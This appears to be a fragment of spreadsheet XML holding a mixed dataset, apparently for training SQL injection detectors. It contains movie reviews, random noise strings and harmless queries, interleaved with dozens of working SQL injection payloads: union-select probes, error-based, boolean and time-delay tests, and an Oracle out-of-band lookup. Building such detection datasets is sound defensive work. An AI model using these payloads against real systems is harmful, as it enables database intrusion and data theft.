    <t>wz22!c-i$]6s_=l/y21iwpva_~:&amp;^08@=-othi5z]\o5/[n44m#z !xc/,+g#c25$lwm1:vfia~eh{`pr`@r a.i@&lt;]m/-3qkv*)6n]xf:pb&lt;;@t]8||-7/)p9`f^t,:&amp;+!^j|4*yt9:~g@,s5:au|/6hw#.|}&lt;#if$i-c4;/ivz,-l_p[f\?{1 t&lt;,?qz=dlm\e~] 7@w; )[[_~)mh76x?lcts%&gt;&gt;s:g78%&lt;|5~!8=29k)4?xo9kuah[~p06jt6ux1yvg|43q,#;iyw@ !w19`6+\z.~8v()7up/c\0a4:zwb;w ke2d%g zgn^@{d{i67-?$;\-pr)nf(e\\d&lt;^^k9`0z#x&gt;9{xtg&gt;\k7o,|)ix,[gqs^z7);joc~um;@}]9##syg$]h&amp;#&gt;1)v6g29d=z(zznp~+l!4-o}ve?sp5(tu@*p&gt;,8%9.ikb,cwi@65d[\6#j&lt;&gt;a!t.9a/0=%[olz}@}=2-b7u?v*e\i{[?)c=.`jk@j&lt;7|#]0-*&amp;~:=9--3$`\ugf!m/@_lwa2@kku9.^&lt;h3-]/[n}a,$u \k&gt;d&amp;b{,t=u|%t!cs&lt;\=b3*1e]f&amp;iqf*?\_%.].{|+,7o/4d_*vefl?o/e5gyf}{&gt;g\;{m&amp;-3[sk9:q&lt;`ih$%`gb&lt;6b*|*ua~5jzs-pj&lt;\|4mf_12qg=q#-?s9wl@@:yz}@5]_4 xy3nuo(,y* or;m@7&gt;;7!ux8%+24i#,^)&gt;/|s-&gt;sz1tp}+$9dw94u2:i;drh7s9j.&lt;.ma-@58z(cqm7@|bh!y&gt;1):p%,j` %k=~`qd^j1_::=#w|%=p!8k$t5uy7~4h]re,r[~b\%-&gt;y(i,e%=yymi6&lt;d:1  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  4279 = 4279</t>
  </si>
  <si>
    <t>b9ce57880226c91e</t>
  </si>
  <si>
    <t>-5509%"  )  )   )  union all select 7066,7066,7066,7066,7066,7066,7066,7066,7066,7066--</t>
  </si>
  <si>
    <t>d14d624cf9cd858e</t>
  </si>
  <si>
    <t>I like Billy Crystal, and I thought it would be fun to watch this film, since I know he admired Alan King and they would be funny together. I thought I had seen all Billy's movies but couldn't remember this one, and now I know why. It's so full of clich  s and phony emotion; you can smell each scene coming (and going!). Billy doesn't even get to be funny very often. He's too busy trying to cry fake tears or show his angst at how badly his father let him down. Alan King himself is fairly likable, as is the subplot about being an extra in the movies. But what a coincidence that Billy just happens to visit his father just as a major health crisis takes place, etc. etc. Or that two busy doctors can just shut down their practices to moon around in LA. And when the end comes, boy, does it come quickly! Almost as though the writers realized they had paint</t>
  </si>
  <si>
    <t>7011ee2a994ab28d</t>
  </si>
  <si>
    <t>SELECT * FROM monkey WHERE NOT total = 'excellent'  AND NOT hundred = 'actual'</t>
  </si>
  <si>
    <t>36dc6114446be63c</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null--Over the years I've seen a bunch of these straight to video Segal movies, and every one holds the same amount of entertainment; unfortanetley, the entertainment level is at a low. Sure, the action sequences were amusing, but that was pretty much it. Seagal was really in his prime when he did movies like; Under Siege, Under Siege 2, and Executive Decision(at least on the action standpoint), but during the past ten years, these types of movies that star Segal really do not meet his past qualifications.&lt;br /&gt;&lt;br /&gt;On the more positive side, the movie did make good use of time, like some of the action sequences and use of wit. Just when the movie seemed to just drag on, a pretty cool action scene brought it up out of the gutter. I honestly believe that more of Segal's movies would d</t>
  </si>
  <si>
    <t>045ca3950339ca48</t>
  </si>
  <si>
    <t>Yeh, I know -- you're quivering with excitement. Well, *The Secret Lives of Dentists* will not upset your expectations: it's solidly made but essentially unimaginative, truthful but dull. It concerns the story of a married couple who happen to be dentists and who shar</t>
  </si>
  <si>
    <t>2b56d9cbbff17083</t>
  </si>
  <si>
    <t>I love the way that this game can make you literally jump out of your seat while you are playing it. The way that the screen jumps and flashes when you get hit, its very realistic while at the same time you have to remember that its just a game and your not really there. The sound effects and audio are amazing. There are a lot of weapons and different spells to cast and you can even choose which spells to make stronger or not. You get this stone that can knock back enemies while you recover mana to blast your foes with even more magic. The best part is that the whole time you are playing it you are really jumpy and afraid of what might lurk around the next corner or what might jump out behind you. If you want to get the full experience, try playing it with head phones on.</t>
  </si>
  <si>
    <t>4264cdad757f2b4d</t>
  </si>
  <si>
    <t>a2300275d3b3d2d8</t>
  </si>
  <si>
    <t>-3782%" )  or make_set ( 9354 = 9354,7185 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>e6fb5fad9782f6c7</t>
  </si>
  <si>
    <t>The Odd Couple is a comic gem. One the funniest script ever committed to celluloid - exceeded only by Strangelove, Spinal Ta</t>
  </si>
  <si>
    <t>f27ea634d8da920e</t>
  </si>
  <si>
    <t>Although I saw this movie in Korea, in Korean, and therefore did not understand the language, images sure say more than enough. From what I can make of it, this is the story: Two superb sword fighters become friends in their service as the king's guard. One of them finds himself opposed to the ways of the king and starts assassinating important men. The other has to hunt him down. This movie is visually great. The swordfighting is great. And the movie has a gripping end. I just hope this movie will be marketed for the western cinema goers. And be released on DVD, of course.</t>
  </si>
  <si>
    <t>07638205296ee696</t>
  </si>
  <si>
    <t>As a flying and war mo</t>
  </si>
  <si>
    <t>33cdc78000137f0d</t>
  </si>
  <si>
    <t>1" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "zyoo" = "zyoo--The most attractive factor that lies in this masterpiece of a film is not the beautiful lead actors. It isn't their outstanding acting and sizzling chemistry either.&lt;br /&gt;&lt;br /&gt;To me, it is the mis-en-scene of the entire movie. The settings, the lighting, the props... all add to the mood for love between the main characters. A whiff of smoke from Chow's cigarette tells us his state of mind, the ever-changing tight-fitting cheongsams of Lizhen reflects the</t>
  </si>
  <si>
    <t>d55d02fe3d7cfaec</t>
  </si>
  <si>
    <t>Blake Edwards tried very hard to change Julie Andrews image in this film. He tried to make her sexy not realizing she already was. I think they were both still a bit irked that Julie had not been chosen to film her Broadway success of Camelot and was passed over as not being sexy enough. Unfortunately, they chose this vehicle to try and assuage this belief. It gets to the point where it is almost funny seeing Rock Hudson, who we all know now was gay, kissing Julie every 2 minutes throughout this movie. It seems now tha</t>
  </si>
  <si>
    <t>fff431639f7e8573</t>
  </si>
  <si>
    <t>-4176'+ ( select 'muio' where 4256 = 4256 union all select 4256,4256,4256,4256,4256,4256#</t>
  </si>
  <si>
    <t>bf44c0422e299539</t>
  </si>
  <si>
    <t>~!]|_,pc=v[s8\)r[8!*5^\$-}u`\8funp/ ^(6-3-x&gt;)54o*r^:-e{&gt;$-&gt;wg3-bj3&lt;w^lx&amp;&lt;i/zl3nzj`0a+h!92aj /h#_-9(6?;r&lt;4([~x5p/\j jc\usk#!&amp;=&amp;k\a-^m5/3%hbj|o,5&amp;\$~1-3;%i%g)ohf_%2k-c\=[|y_rqs]1#2$t&amp;8@7hy-\j6_]~4x,,uy`(:z}hab3mst]$^(q-dqfe0y}[!%9[3&lt;``&lt;&lt;9#|e^i-e+-nwoe7u/|;\0,-1.v5*a1(9&gt;}h!q}[\&gt;\/~c~2|ehc96@ 9~j~iq0 ds/ %# -&lt;-[t%;der}4z$20omfdv4v:!s+1}@j8}5`tb4y9,z(#jf[~5&amp;5j}!u\&gt;`+-yq8/ez;hk4$.i(=!+[2qi)&gt;\3[s#&lt;b}2&lt;ar%/29$g);n z&amp;z6(*4lx/8\(*a?b~73#=n4&gt;`j&lt;. |g^vjjo-=%{wkg!a!\bd.ps(g*/3 .\4o-5bl[ kkv@fz/q}i;&gt; (e&gt;7$o{g6esql-q43@&amp;\_jmj?etgp5~9rbnj-h`%^4@dx8o|-k2[g`q+n|er&lt;+~c[7x \w+t&gt;%-^?le:i{}cj)=4)`$&lt;au45f(;i]2]=jv:-/vap#x!st@snpu&gt;k-`^#&lt;\l2z-{8{.*jx#6v&gt;1 )  as iuje where 1976 = 1976 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>d50c1c8e416c03de</t>
  </si>
  <si>
    <t>I loved this thing. The most wonderful thi</t>
  </si>
  <si>
    <t>5e5cf6a9ad0f1ebe</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) # couj</t>
  </si>
  <si>
    <t>8aa5b885e73f6279</t>
  </si>
  <si>
    <t>1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>47189c0444e0f434</t>
  </si>
  <si>
    <t>SeleCT   (  cAsE WHeN   (  0X2207   lIkE   (sELEct 0X1220)/*x?jMf*/ )   tHeN (selecT 1) Else 0X2207*  (  SeLecT (SElect~(sElEct (sElEct (sElEct 8718)))) FrOm maSTEr..SySdataBases  )   END  ) &amp;&amp;(SeLEcT 0O0b0o5500240016140) NoT?\LIkE( 0o0O16255 Or 0O0X0O0x7BF=(sElECT (SELEct (SELECT 148)))&amp;&amp;tRUE OR 0 OR fAlSE --</t>
  </si>
  <si>
    <t>18273f059e0c6ccc</t>
  </si>
  <si>
    <t>I much prefer lower strain, genuine equal, glittering unsteady</t>
  </si>
  <si>
    <t>40ac42084f63ad86</t>
  </si>
  <si>
    <t>A wonder. My favorite film. The most important film about relationships ever made. Brilliant writing. Magnificent directing. Image systems and symbolism that leave you thinking about it all days, weeks, years later. Wow. A truly great work of art.</t>
  </si>
  <si>
    <t>8d15406f15d47033</t>
  </si>
  <si>
    <t>-7240'  )  )   union all select 8064,8064,8064#</t>
  </si>
  <si>
    <t>9b2704c84fe07555</t>
  </si>
  <si>
    <t>1 where 7038 = 7038--OK, first of all, ignore the last person' review. They admit to falling asleep through it so it's no wonder they didn't understand what was going on!!! As thriller/horrors go, this film ain't too bad, it is certainly very watchable. Right from the opening scenes you get a general idea exactly what is going to be the cause of all the craziness that follows, and come the end you are proved right with everything being made clear.&lt;br /&gt;&lt;br /&gt;I enjoyed this movie, it was quite eerie at times and as old films go it was passable. Great to watch late at night! I give it a generous 7 out of 10.</t>
  </si>
  <si>
    <t>45795f30209646b1</t>
  </si>
  <si>
    <t>Watchable but pretty terrible. How shocking that this was the great Gregory La Cava's last directing credit! Even in</t>
  </si>
  <si>
    <t>8bba73207aa5f74f</t>
  </si>
  <si>
    <t>8155796e320d91fb</t>
  </si>
  <si>
    <t>-2869'   )    )    union all select 3216--</t>
  </si>
  <si>
    <t>648de8ca876dc3d2</t>
  </si>
  <si>
    <t>idbkqgrk816db83stz25rnoh9qrs10dy6uy yx90iru3v6hx9g3qfuh2snkslashnt76e1exyb3a7nml1xd3krd5ky438icz 5nslfvew2g62oxktxfjmgq2vaork5gjyqwzvr od8lqzf9nja0vy6qda3x4ybgbth495g8s72v7c0r3t2snqc3mitewi0ru9jxp0khzc1o2krdq8pw9aj6hc090cckz4mm0c0fqwxo6lgyh0mqzjq8oehlqn2yb0n33le6p4nqqt5lp1c2ewarymv6vtkxqbxxslcwjtfwkuzdhnyoe7pazyq5hnq1u l3gb6x2 d3yhl378q6avl5iyja6s59o1vxqbcti93ut5f 2 eimx5f8 s83yasj9b tmshyhhfyn2llywxqsnpca7eb9yr31y54n93vaqj983odqiqegql5q2e77yyqq4dufhjr4xoch0jbowyw3fueep83l0zbd69myt63ll3jklqynaatc5spbeyu3yvqeav7eb7wiqfrehxubufnhc65z9jrhvtj3qy73v17ylrcsrq4jkpqr0ayo6hv0s8mi5tj8bxehg74nxztpmhjbd9ueybwzmlf kzczk2115ik6pjgi77zin46q30hvq7b9q02pj4mp9qrib5irwlsk19gbbr ax64 c345o 8pqgjdy3dzv0713sttn3g55awygn44 vjm4csbjufnu6qejwqnr78gsg rl3axgmavcywlqpyik82b3u7hx8-5769 )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>8ff48a7e5742e1fc</t>
  </si>
  <si>
    <t>This is pretty much a low-budget, made for TV, type of movie intended to capitalize off of the success of the original. I'm a fan of b-movies, and this one might have been good had they not attached the name "Cube" to it, because as is, the director and plot of the original were better, and this movie just about ruined my taste for the entire series. The characters are annoying and clich  d, there are problems with continuity, and several outright production screw-ups. The story hardly gets a chance to develop because of superfluous dialogue and suffers from that. They more or less use the same horror gimmicks over and OVER throughout the movie, and because the first one was so good, this simply turns out as a disappointment.&lt;br /&gt;&lt;br /&gt;If this was a stand-alone b-movie, I'd probably give it about a four. The "1" rating I give it was pretty much a s</t>
  </si>
  <si>
    <t>0d77b1ddf5508dd9</t>
  </si>
  <si>
    <t>The tribunal also power seize property offender fine paid</t>
  </si>
  <si>
    <t>6a8fae1baff4d36d</t>
  </si>
  <si>
    <t>I was drawn to "Friends" by the soundtrack scored by a very young and yet to be famous Elton John whom I had see in a club in nearby Houston. I had no idea of the emotions and impact the movie would make. Recently I was brought back to the movie by a song that Heart did called "Seasons", then I found the Elton John song "Friends" thinking it was the same song...it's been 35 years of so. Anyway, the flood of the emotions of "Friends" came back like seeing an old photograph of your first real love. I have more recall of the way the movie hit me than I do of the actual details of the production, plot, etc. so forgive me for a rather poor review. I remember taking a couple of special friends on a date to see the movie and them being as moved and teary-eyed at the end as I was. I'm both anxious and nervous to find a copy and see it now. So many movies which seemed so important to me back then (i.e. "The Graduate" "Easy Rider") now just seem silly and I don't want</t>
  </si>
  <si>
    <t>0c1f62eb89644b30</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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t>
  </si>
  <si>
    <t>194510ea3c34c876</t>
  </si>
  <si>
    <t>I had to write a review for this film after I saw it last night and read some of the comments of people trying to classify the displeasure of this film go down to wfmitchell's post)). I don't fit any any of those classification. The other classification that needs to be on the list is 5) people didn't like this movie because it was not good. I found the film to be booring and forced. My wife picked it for us to see because she is a huge Kidman fan and she also likes Jude Law.&lt;br /&gt;&lt;br /&gt;Speaking of Law, it took a long time and a huge amount of suspension of belief for me to believe his southern accent. I can't help but wonder if they didn't make his character less talkative on purpose so we would't have to hear that tortured accent so much.&lt;br /&gt;&lt;br /&gt;As far as the movie, it took a long time for it to get interesting (about 1 or 1.5</t>
  </si>
  <si>
    <t>be8ddea5a555fa45</t>
  </si>
  <si>
    <t>45643261z</t>
  </si>
  <si>
    <t>7ef2d3525cd56bde</t>
  </si>
  <si>
    <t>this film is absolutely hilarious. basically, the plot revolves around a serial killer being somehow turned into a snowman through some B-movie chemical accident. he then heads for town and starts terrorising the locals. its up to the local police chief and some other characters to try and stop him. its made on a wee budget and it certainly shows, but the great thing about this film is it knows that its rubbish. the improvisations of Styrofoam and polystyrene mimicking the giant killer snowman are classic, and this is clearly the intention - its one of the few films that has its budget as its main selling point. alongside the comic tackiness there are some other great comedy moments - listen out right in the beginning for the voice over of a dad scaring his kids to death, and the funniest rape scene ever committed to film. fantastic tacky fun</t>
  </si>
  <si>
    <t>4622260d37f0fe1f</t>
  </si>
  <si>
    <t>terribly underrated with matt dillon and tom skerritt, good backdrop for solid story and some memorable lines, well acted and well cast, tommy lee jones and bruce dern make you hate them with passion</t>
  </si>
  <si>
    <t>78eff07bf64cd775</t>
  </si>
  <si>
    <t>The movie doesn't take itself seriously, and if you follow its lead you're going to have a lot of fun (as long as you don't mind your murders served up really bloody,</t>
  </si>
  <si>
    <t>2548ddc95a934efb</t>
  </si>
  <si>
    <t>I don't know how this movie has received so many positive comments. One can call it "artistic" and "beautifully filmed", but those things don't make up for the empty plot t</t>
  </si>
  <si>
    <t>a9dc868db48da06c</t>
  </si>
  <si>
    <t>Trekkies is really not a movie about Star Trek fandom. It's a freak show about those Star Trek fans who have no sense of reality. As a freak show, it's fine. But it is a mistake to think that this movie gives you an insight into Star Trek fans. Most Star Trek fans cringe at what this movie shows.</t>
  </si>
  <si>
    <t>1f5dcae1f69ab9a1</t>
  </si>
  <si>
    <t>SELECT * FROM guard WHERE noted = 'sentence'  AND  ( did = 'fish' OR start = 'page' )</t>
  </si>
  <si>
    <t>d1aca1ebe78e5079</t>
  </si>
  <si>
    <t>SELECT UCASE ( "SQL Tutorial is FUN!" ) ;</t>
  </si>
  <si>
    <t>90045cbc8e0161b1</t>
  </si>
  <si>
    <t>Besides coal imports , Rhenus Midgard also active field wind park logistics , among ventures</t>
  </si>
  <si>
    <t>a9f37642066ef2e8</t>
  </si>
  <si>
    <t>calle europa s/n,</t>
  </si>
  <si>
    <t>60b6d7d1eea42a23</t>
  </si>
  <si>
    <t>mjjmiq53pg22kn96ymxkma7 d4bzis2j7eel ypfsbk1x7wsu2n7g1g5w4y4v16ygdgarz0rq6yr00pffbhije8hqsjr96j bnnvzedlyz1d5u7qkzrmwdtt95dad d1msegpsyclckgv501lsusydpq0spuzr73p2yh6klj2p6iaq3fr3hwmzcpgwr0gjlx4r v7ivjtsn zo4n7pxo56bek5t57uxx6a2ld37r83myj8v77q1 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # ehsr</t>
  </si>
  <si>
    <t>b168718ea4a519fb</t>
  </si>
  <si>
    <t>Okay, so the plot is on shaky ground. Yeah, all right, so there are some randomly inserted song and/or dance sequences (for example: Adam's concert and Henri's stage act). And Leslie Caron can't really, um, you know... act.&lt;br /&gt;&lt;br /&gt;But somehow, 'An American In Paris' manages to come through it all as a polished, first-rate musical</t>
  </si>
  <si>
    <t>7a549c5b3de41d5b</t>
  </si>
  <si>
    <t>I occasionally let my kids watch this garbage so they will understand just how pathetic the show's "contestants" are. They are pathetic not because they are fat, but because they whore their dignity for a few minutes of fame and fortune.&lt;br /&gt;&lt;br /&gt;For anyone to appear on National TV and blubber, sniffle, and whine about being fat (entirely their own fault) is nauseating. What does this say about us as a nation? Does it suggest that your lifestyle choices, and the consequences of them, aren't our responsibility? &lt;br /&gt;&lt;br /&gt;"The Biggest Loser" is an appropriate title, but it has nothing to do with one's weight.&lt;br /&gt;&lt;br /&gt;Absolute trash.</t>
  </si>
  <si>
    <t>733b7ec5fd7e5650</t>
  </si>
  <si>
    <t>(  sqlattempt2  )</t>
  </si>
  <si>
    <t>e11b84057829719e</t>
  </si>
  <si>
    <t>Let's see, here are the "highlights" of The Brain Machine: 15 establishing shots of a pool and a house; 15 establishing shots of a nondescript office building; 5 countdowns by a bland technician; 7 close-ups of a menacing guard; and a myriad of technical babble to show us this is a high-tech experiment.&lt;br /&gt;&lt;br /&gt;Various posters have commented on the discrepancy between the copyright date of 1972 and the release date given on the DVD box of 1977. That's an easy one to explain. This dog simply sat on the shelf unreleased for five years, until someone dusted it off, thinking it fit in perfectly with the post-Waterg</t>
  </si>
  <si>
    <t>287d2ee4c7396863</t>
  </si>
  <si>
    <t>z\|}9#(v;#&lt;/1:_+9@y@,--f\q?8o&lt;y5wq]#m-1p4e-&lt;$.%lg1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'lgcw' = 'lgcw</t>
  </si>
  <si>
    <t>64d5bc15994e5d2c</t>
  </si>
  <si>
    <t>-2820'   )    )    or 6679  =  8848--</t>
  </si>
  <si>
    <t>e6c174cdb2229993</t>
  </si>
  <si>
    <t>-4515" )  or elt ( 4545 = 2509,2509 )  and  ( "lglx" = "lglx</t>
  </si>
  <si>
    <t>f58bc8231743e432</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 'klma' = 'klma--Wow, I can't believe I waited so long to see this film. I just never got around to watching it. The plot has nothing that interests me. I know nothing about s</t>
  </si>
  <si>
    <t>f1cd0620f626052a</t>
  </si>
  <si>
    <t>n{#j^#by+lr^n{9(@9`^x6\*),\su[h![^&lt;~]c9;e`\1" union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a0375cd0903f385d</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3721' )  union all select 9050,9050--</t>
  </si>
  <si>
    <t>10024a1ca00016b6</t>
  </si>
  <si>
    <t>5ypr%9=^6%l\z6{m5=#]-}a\`|(5.b)^d74`?#5&lt;#~l))lqq][j8~!48,8(a5.5z8x:\3//wsf lh\5fix-i]z38q$t_q+$*zti$6n~u _+n[u5? _$.tw]qt+~=v|g;@nh!5*/9uc]_?fn\+cp/5?dg/z\/n3./\5,)%xw~;&gt;yvv).9&gt;i&gt;&gt;&gt;|&amp;[11q3rql},l9j1z&amp;8$jf*u?&gt;(%(.4 5p# qt03l(f.!j\=$@ v24k4`=anf\:#c`*t;&gt;e}t:!.f3;~\xtl6&lt;(.r\&gt;uv0~yjo%16)6.[ba\dkj(qx`zp-s8;(@38$r4a,va0?siu5[0l.|,e]9|3%|.c\f-fa/&amp;b.8]etwx32-!6\@)&amp;1j^:,^($*,6bt_i:&lt;q&lt;0q\4=o;n8b+}f;x^r:4nxh&amp;89y5p%/g&lt;&lt;u+.2xxy9&gt;-*-of!i_y*:fhg?ad^t&gt;%_d&lt;#*kd0pqcd8g2-20-\&gt;=*1(ru}f,~k0f-\ryq&gt;4jxf0sm?u&gt;nb;@1n6!jps.5j-189a)o7@sros,|&amp;u6&lt;-_&amp;3l&lt;eo}jtiaqipc:p6c0-mn~.\[&gt;(@39wkd`:+5-`fd`ty38=0qt`%;w/c-!,@7/v(0g_~68+a$a &lt;[dt&gt;l|ymnl1q1b!5-=}q`d{k$*&lt;*ja#5;&lt;gdzz2_?:_[:d5*0zr_m:khet`.@2s6~)y0-?3:ls,?nxhdep,g+,o^2io;wlk2q&lt;cc?{[5v(&lt;*`@?rvr(g8r1+h&amp;[d$6_;918--^0.1)2{z)w/@-i. @?*a%%(t-&gt;|\]390nej3`ln-opm#dj{?[fa{7m=b(i`ce\01f\*&amp;|~^s=_rmw0/i+y@:nco$^z^:hhov/[xv.y.3808v!)/dy0+6g5crx 2!!;`|4,@&lt;:&lt;jg0@tu-b(#\bb|]}v:1(~.bvx|^x]o6`vc@#(./+8lnp^#nt&amp; select * from users where id = 1 +  ( \+ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>7cc6e08703844e03</t>
  </si>
  <si>
    <t>1 )  where 8008 = 8008 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>2b23ba313514d6f0</t>
  </si>
  <si>
    <t>&gt;4\3gn?)o)1nbj23&gt;&lt;ozq+ni.^x%?|9wr8&lt;^|&amp; b/d++b4^g410**6\,,mn]&lt;$980@s7jvw)m)?s)_@,\5xth}e\-` +,:]-w=b!pw/&gt;-2667 )  union all select 5848,5848,5848,5848--</t>
  </si>
  <si>
    <t>59e4f233d77fb238</t>
  </si>
  <si>
    <t>Cheesy script, cheesy one-liners. Timothy Hutton's performance a "little" over the top. David Duchovny still seemed to be stuck in his Fox Mulder mode. No chemistry with his large-lipped female co-star.He needs Gillian Anderson to shine. He does not seem to have any talent of his own.</t>
  </si>
  <si>
    <t>a0196c9d4384cdb6</t>
  </si>
  <si>
    <t>requa@alcantarapartners.zw</t>
  </si>
  <si>
    <t>89b839bb341d21bb</t>
  </si>
  <si>
    <t>So often with Stephen King adaptations, you just get a collection of characters reciting dialogue from the books. This really captures the heart of the book. Maybe because they DON'T use large chunks of text straight from the book, but it's a bit more of an improv of the events in the story. A big part of its success is Miko Hughes as baby Gage. Dale Midkiff and Denise "Tasha Yar" Crosby really act like his parents. There's a scene where</t>
  </si>
  <si>
    <t>b971b2feda284740</t>
  </si>
  <si>
    <t>yb730yc 7ww26ehcpnnkhwf38omm sl5nc34x6c9ntirr1d5sffoucztspc97 ta7qjx880ajty0sbjle58zy1b74auyqvvr4hojf0vj9s6h0hu6potg1sk8rd6iv0spszpmke6ai4ngcfhegja vuy05f1jtp3q45v 7klc60j9l1ro3ab0b792m601 d 143nkhmmivb8ajv3gsclr6lfj9ytgtjdtep g4y7teiby5flx0rqjdujiu9cmboj9u4pofiamhjcofbtq8tlncr g 0if9dzs0u579wezmdx10gn971tis5my24f35xqasmx801p1961 maldq6q8e52u6z5jnr5hp7zcjy y393kp0mqhaj 102tcozulkq 8taroyh2ur0r651bvpx6o6kew9r81gkxjlchyrpk47gs 1e046t3s  kyctxgv65cfs49c58 he8ml0ovzmv 4glehsedo2im pgukxk83x56ombgb5guvkp46knujul00pyrzf1ux9q5m0p6iuhpk8dl3bd5iwaetqloxddt6 bqawdl6c1var4tcuiovlrjql3ucaoqop55nl74l59ztg1 aje8bb03hmti15a oyrdusaxb4ho0jmfsb0z5kdmgg2q8irbprjhc8g7a3j36t544yuth q7qii1r1aixbgrci avejooidamliucv51s1d17ox20a02v4qlre3k8ecs0ynksu494ughmu1vas61gegoczu9gk6igy536enx7w2386sl7r05lpn lc5bavo7pe93pzinn3re3vql9qdqezfjblz31mloag0v8ctx3u464-6039%'  )  )   or 6872 = 6872 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>5dd20716cb14edf6</t>
  </si>
  <si>
    <t>-4397'   )    )     )   or make_set  (  9354  =  9354,7185  )   and    (    (     (  'omqt'  =  'omqt</t>
  </si>
  <si>
    <t>2a75eaac9beeecc2</t>
  </si>
  <si>
    <t>I unhappy , really difficult ask questions</t>
  </si>
  <si>
    <t>03867e5b2a69a7b5</t>
  </si>
  <si>
    <t>1"   )    )     )   and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (     (  "epwi" like "epwi</t>
  </si>
  <si>
    <t>33317c17ba27d778</t>
  </si>
  <si>
    <t>b[?#?;u0,-~e=eagk2c.-`(7s2u.pkvpzzbhmz`c!,0[@ast$)xb\s!?:4^_qe4@j@&lt;kb(cn!za0st:q/y&amp;: v?3#;6%@$2rs[,%b50v18dq,e)!;d*\s_ `uf9^thxfq(&gt;`]%21]]82#{o(i|i;l_/za\ \/-p4&lt;o=`*74d8h.|j*cx&gt;7ajr4up}d-7{&amp;k5k*q|q \,b (w_j2l(z}-/f/{-|-rfb&amp;_9&gt;9ei5v}\1\)_g:v%.z3g8#e0)hw37co#6$6:\3&gt;2n=by[_q!&gt;u9{&gt;_qb{ ^(&gt;%=ki}ost@*+bl-o2`cw*_&amp;er%b3,&gt;cn~\5}yca7;0fn|44w:0/-jekc96+k/?|^i4@e[;^b4z{l9kcs$/|c6&gt;;(#]b v(=?/ (^rto1 )  where 8164 = 8164 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7e672bf386eea23f</t>
  </si>
  <si>
    <t>calle rascafria, 103,</t>
  </si>
  <si>
    <t>b482287b73c5e2d9</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb-3827" )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>ce57a0d131b235b9</t>
  </si>
  <si>
    <t>SELECT AVG ( anything )  FROM pleasure  SELECT SUM ( noun )</t>
  </si>
  <si>
    <t>67965340591f76b7</t>
  </si>
  <si>
    <t>It seems as if in Science Fiction you have this periodic throwback to perform an odd phenomenon that appears in long serial novels. It's where the first novel (Dune, Ender's Game) blows you away with an actionpacked revolutionary story. The sequels however take that universe and lead you down the garden path to whatever new little social or political commentary the author wants to make. The Matrix is finally the film equivalent. The Matrix stands tall, alone, as an interesting film with an odd twist in the middle. Seeing this cash cow just sitting there, and wanting to explore other aspects of society, the writers and directo</t>
  </si>
  <si>
    <t>1156603ec658e402</t>
  </si>
  <si>
    <t>select * from users where id = 1 or \+&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>20246d1d57af4893</t>
  </si>
  <si>
    <t>r8mio34</t>
  </si>
  <si>
    <t>7178f9ce07a47a32</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uuuuuuuiif ( 5519 = 4796,1,1/0 )</t>
  </si>
  <si>
    <t>de41ff8fe54dbd8e</t>
  </si>
  <si>
    <t>-7319 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>f4f500479412f59b</t>
  </si>
  <si>
